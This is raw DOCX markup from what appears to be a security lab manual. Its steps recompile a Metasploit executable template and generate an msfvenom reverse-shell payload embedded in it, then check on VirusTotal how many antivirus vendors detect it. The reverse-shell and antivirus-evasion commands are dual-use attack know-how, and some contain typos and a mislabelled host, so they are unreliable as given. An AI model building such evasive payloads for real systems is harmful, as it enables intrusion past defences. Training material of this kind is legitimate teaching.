                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3355017" cy="2722007"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="47C5A6B5" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8. Execute the command </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>usr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/share/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>matasploit</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-framework/data/templates/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/pe/exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to navigate to the exe folder.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04994DF7"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2B639BDC" wp14:editId="275F124D">
                  <wp:extent cx="4590255" cy="843508"/>
                  <wp:effectExtent l="19050" t="19050" r="20320" b="13970"/>
                  <wp:docPr id="410452836" name="Picture 41045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8.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId13">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4634368" cy="851614"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="0850B8E7" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9. Execute the command </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">i686-w64-mingw32-gcc </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>template.c</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> –lws2_32 -o evasion.exe </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>to recompile the standard template.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BD223ED" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="054DE37A" wp14:editId="181C6816">
                  <wp:extent cx="3931670" cy="973677"/>
                  <wp:effectExtent l="19050" t="19050" r="12065" b="17145"/>
                  <wp:docPr id="410452837" name="Picture 41045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9.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId14">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="3950919" cy="978444"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="67B902CD" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">10. Type </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and press </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Enter </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">to list the contents of the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> folder.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FAD6C28"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14D1C047" wp14:editId="4DCA24AE">
                  <wp:extent cx="4456642" cy="1495071"/>
                  <wp:effectExtent l="19050" t="19050" r="20320" b="10160"/>
                  <wp:docPr id="410452838" name="Picture 41045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10.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId15">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4474960" cy="1501216"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B1B13C4" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">11. In a new terminal, generate a payload using a new template by executing the command, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>msvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> -p windows/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>shell_reverse_tcp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>lhost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>=[</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Target IP Address] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>lport</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>=444 -x /usr/share/metasploit-framework/data/templates/src/pe/exe/evasion.exe -f exe &gt; /home/attacker/bypass.exe</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58D25338"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5EEE0C96" wp14:editId="6D65CD7A">
                  <wp:extent cx="4595362" cy="795350"/>
                  <wp:effectExtent l="19050" t="19050" r="15240" b="24130"/>
                  <wp:docPr id="410452839" name="Picture 41045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7080" cy="800840"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="17CF5F7E" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12. Now, switch back to the browser window, and on the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> page, click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Upload file</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> button at the top.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098F1794"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7588AC3D" wp14:editId="1744A828">
                  <wp:extent cx="4609375" cy="2191916"/>
                  <wp:effectExtent l="19050" t="19050" r="20320" b="18415"/>
                  <wp:docPr id="410452840" name="Picture 41045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12.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4618573" cy="2196290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="51884216" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">13. In the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>File Upload</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> window, select </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>bypass.exe</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> file from </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/home/attacker</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> location and click </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="735C1E1B" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF3D415" wp14:editId="081C0366">
                  <wp:extent cx="4299830" cy="3104974"/>
                  <wp:effectExtent l="19050" t="19050" r="24765" b="19685"/>
                  <wp:docPr id="410452841" name="Picture 41045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13.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId18">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4304864" cy="3108609"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="2FFBE307" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">14. After selecting the file, click on the </w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:b/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Confirm upload</w:t>
            </w:r>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> button. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> will analyze the detection of the malicious file. You can observe that now, only 45 out of 68 antivirus vendors have detected malicious files. Thus, we can evade antivirus detection by modifying templates. The result might differ when you perform this task.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D4148B3" w14:textId="77777777" w:rsidR="00CB1469" w:rsidRPr="00F00D26" w:rsidRDefault="00CB1469" w:rsidP="009A3A3B">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F00D26">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35BB0465" wp14:editId="62A47433">
                  <wp:extent cx="4476750" cy="2128848"/>
                  <wp:effectExtent l="19050" t="19050" r="19050" b="24130"/>
                  <wp:docPr id="410452842" name="Picture 41045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14.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId19">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4488862" cy="2134608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:solidFill>
                              <a:sysClr val="windowText" lastClr="000000"/>
                            </a:solidFill>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7BA908E0" w14:textId="77777777" w:rsidR="00B85E14" w:rsidRPr="00CB1469" w:rsidRDefault="00B85E14" w:rsidP="00CB1469">
      <w:bookmarkStart w:id="9" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:sectPr w:rsidR="00B85E14" w:rsidRPr="00CB1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617A14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="59684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2EC"/>
    <w:rsid w:val="002F7AFB"/>
    <w:rsid w:val="004D22EC"/>
    <w:rsid w:val="00814574"/>
    <w:rsid w:val="00950B2F"/>
    <w:rsid w:val="00AB1F43"/>
    <w:rsid w:val="00B85E14"/>
    <w:rsid w:val="00C32321"/>
    <w:rsid w:val="00CB1469"/>
    <w:rsid w:val="00D55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C54C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0795E469-F08C-43EE-A67C-2CA1ADAE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PS Body"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsia="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002F7A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IPS Heading 2"/>
    <w:basedOn w:val="Heading1"/>
    <w:link w:val="Heading2Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:spacing w:before="480" w:after="180"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Constantia"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:color w:val="171717"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:aliases w:val="IPS Heading 3"/>
    <w:basedOn w:val="TOC3"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:pPr>
      <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
      <w:tabs>
        <w:tab w:val="left" w:pos="960"/>
        <w:tab w:val="right" w:pos="9010"/>
      </w:tabs>
      <w:spacing w:before="120" w:after="120"/>
      <w:ind w:left="0"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
      <w:szCs w:val="16"/>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Q"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="ListParagraphChar"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ListParagraphChar">
    <w:name w:val="List Paragraph Char"/>
    <w:aliases w:val="PQ Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="ListParagraph"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsia="Constantia" w:hAnsi="Constantia" w:cs="Times New Roman"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:uiPriority w:val="59"/>
    <w:qFormat/>
    <w:rsid w:val="004D22EC"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Constantia" w:cs="Constant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qFormat/>
    <w:rsid w:val="004D2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IPS Heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading2"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="002F7AFB"/>
    <w:rPr>
      <w:rFonts w:ascii="Constantia" w:hAnsi="Constantia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:noProof/>
